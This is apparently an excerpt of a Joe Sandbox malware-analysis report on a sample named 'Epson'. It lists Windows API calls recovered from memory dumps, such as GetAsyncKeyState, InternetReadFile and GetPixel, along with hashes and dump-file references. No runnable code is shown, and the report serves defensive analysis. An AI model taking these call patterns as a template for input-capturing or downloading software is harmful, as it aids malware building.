                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E410635A08784AFC725EF6DCC88FA67B65FB45364F150224F819AB2E0D370AD11FA50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                      • Opcode ID: 2d224b00a8625f8bad585af1f7b299573314c7b28277ad9b033fbcfece522e11
                                                                                                                                                                                                                                      • Instruction ID: e9b982d8c08e13f6c285ed714e10b928c04e3bcd499a48dd5c75052ee3ba8da5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d224b00a8625f8bad585af1f7b299573314c7b28277ad9b033fbcfece522e11
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4741D672E002009FDB20EF78C885A9DB7E5EF88324B158569E515EB386DB35FD01EB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F519E1
                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00F519FE
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00F51A23
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00F51A3D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4210589936-0
                                                                                                                                                                                                                                      • Opcode ID: c08b58b48391d99a9cc4f0c94f1e0b9ca196137602c16244599e5cc1821ae8be
                                                                                                                                                                                                                                      • Instruction ID: 29ac0bead16757c38c7b6344c496a8dfd9a4c0b9be888922d9ce67755cad2d54
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c08b58b48391d99a9cc4f0c94f1e0b9ca196137602c16244599e5cc1821ae8be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52417F71A0410ABFEF059F64C844BEEB774FF45325F208216E829A62A0C7346A94EB51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetInputState.USER32 ref: 00FC4310
                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00FC4367
                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00FC4390
                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00FC439A
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC43AB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2256411358-0
                                                                                                                                                                                                                                      • Opcode ID: 463c636550cb3bf319ace73bdf8d6c49947b0edee694226d0d3e2d4a44f04544
                                                                                                                                                                                                                                      • Instruction ID: 6ae15edd269b370d17bdc90a69db69bea69362a26e076667bf37bf5d46ad2917
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 463c636550cb3bf319ace73bdf8d6c49947b0edee694226d0d3e2d4a44f04544
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5431F770D04387DEEB38CF74DA5AFB63BA8AB40314F14456DD4A2C6090E3A9B485FB25
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00FB2262
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00FB230E
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00FB2316
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00FB2327
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00FB232F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                                                                                      • Opcode ID: 21179d6af65765bf542efebfc3ae646070eeed6ffab671384f884d246dcd95ae
                                                                                                                                                                                                                                      • Instruction ID: 08e631326d7a1b42732489bf44a9260c897169c94a471e92ab6e0f27699febe8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21179d6af65765bf542efebfc3ae646070eeed6ffab671384f884d246dcd95ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A31B371900259EFDB14CFA8CD89ADE3BB5EB04325F104229F925EB2D0C7749944EF50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00FCCC63,00000000), ref: 00FCD97D
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00FCD9B4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00FCCC63,00000000), ref: 00FCD9F9
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00FCCC63,00000000), ref: 00FCDA0D
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00FCCC63,00000000), ref: 00FCDA37
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3191363074-0
                                                                                                                                                                                                                                      • Opcode ID: 27331876337eaa60af0c841e644750e96563c62c44ea7e4bb50a2b5980502db8
                                                                                                                                                                                                                                      • Instruction ID: 4373371eef04fac21b45da21e6faf45f9769b4a4fc0b8d99a432a7758a796d36
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27331876337eaa60af0c841e644750e96563c62c44ea7e4bb50a2b5980502db8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C316B71904206EFDB20DFA5D9C6FAEB7F8EF04364B10842EE54AD6541DB34EE40AB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00FE61E4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00FE623C
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE624E
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE6259
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FE62B5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 763830540-0
                                                                                                                                                                                                                                      • Opcode ID: 63919b02f85ab5388c521e1d18a7cde4075471807ba42425d9a8afb243498234
                                                                                                                                                                                                                                      • Instruction ID: 65bf69acc92d54fa6e65339e10ea4c20a6fbb51e7892b20912c0806e30adb41a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63919b02f85ab5388c521e1d18a7cde4075471807ba42425d9a8afb243498234
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A219131D0029C9BDB219FA1CC84AEE77B8FF14764F104216FA29EA180D7749985EF50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00FD13AE
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00FD13C5
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00FD1401
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00FD140D
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00FD1445
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                                                                                      • Opcode ID: 87a05f2f4906cadf61e129331d7711958ec2226d8291b1ad907ff26de4b743c9
                                                                                                                                                                                                                                      • Instruction ID: 7d4efb5c720d066bc0edd57a66f9f04abe775f8d467ef02c32c8624586951492
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87a05f2f4906cadf61e129331d7711958ec2226d8291b1ad907ff26de4b743c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D218E36600208AFD704EF65CC85E9EBBF6FF88741B04842DF85A9B751CA34AD04EB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00F8D146
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F8D169
                                                                                                                                                                                                                                        • Part of subcall function 00F83B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F76A79,?,0000015D,?,?,?,?,00F785B0,000000FF,00000000,?,?), ref: 00F83BC5
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F8D18F
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8D1A2
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F8D1B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                                                                      • Opcode ID: 54dddc649cdb25772140d687f290e7421d5fb18611026ecff37978e3935f0438
                                                                                                                                                                                                                                      • Instruction ID: 133d64cf32628a0d2bd52e4c35895a3ef2354b5f5ff2c27729fc3c1f1f12abaf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54dddc649cdb25772140d687f290e7421d5fb18611026ecff37978e3935f0438
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4201B172A01A197F372176765C8DDBB7B6DDFC2BA1314012AFC04C6284EE658C01A2B0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2931989736-0
                                                                                                                                                                                                                                      • Opcode ID: d71b0013f5271ca86089f80ed50c44e4cc3a958c3189f99f5ae8ed0f028a3659
                                                                                                                                                                                                                                      • Instruction ID: ad64974bf689382550b1d81c87ed4b91829baad0aafde2c0c11eda8bc19ee4c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d71b0013f5271ca86089f80ed50c44e4cc3a958c3189f99f5ae8ed0f028a3659
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B70179B2A043097B9714661B9C42FFB735DAE503E8B004025FE0DDA242EB69ED15F9A2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(0000000A,?,?,00F7F64E,00F7545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F83170
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F831A5
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F831CC
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F831D9
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F831E2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                      • Opcode ID: cf9d8a4bc51f86b1a7c7799f54b8da0c49b77eb4b54de3e4a45b144f2e366c3d
                                                                                                                                                                                                                                      • Instruction ID: 95e036cc045d415759d930741e48e2849ec824f6266b22a231274f39f8761850
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf9d8a4bc51f86b1a7c7799f54b8da0c49b77eb4b54de3e4a45b144f2e366c3d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD01F473F41E007B961236349C8EEEB3669AFC1F713200429F925961A1EE2A8A017360
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?,?,?,00FB0C4E), ref: 00FB091B
                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?,?), ref: 00FB0936
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?,?), ref: 00FB0944
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?), ref: 00FB0954
                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?,?), ref: 00FB0960
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                                                                                      • Opcode ID: ccdbd65b2ea1d741c93d4216b2504f85d80457934ed6638bc09e1f811b40e38b
                                                                                                                                                                                                                                      • Instruction ID: 937fe2361dbaf79b253f43b426bb600448937c02cc68d4bfcf28149878746bfb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccdbd65b2ea1d741c93d4216b2504f85d80457934ed6638bc09e1f811b40e38b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06014F76A00319BFEB114F56DC84B9B7AADEB847A1F144124F905EA211DB71DE40ABA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00FBF2AE
                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00FBF2BC
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00FBF2C4
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00FBF2CE
                                                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 00FBF30A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                                                                      • Opcode ID: 2023227469cdad05c91cc0595d5fb75f02f7173e9afccefb7d0941e07f139263
                                                                                                                                                                                                                                      • Instruction ID: 7f20505392d2a9f66415d51bbbe01b071418f86565c69277ddf5fdea7aa67cac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2023227469cdad05c91cc0595d5fb75f02f7173e9afccefb7d0941e07f139263
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15018071C0161DDBDF00AFB5DC89AEDBBB8FB08710F040466E501B2240DB349558EBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FB1A60
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A6C
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A7B
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A82
                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FB1A99
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 842720411-0
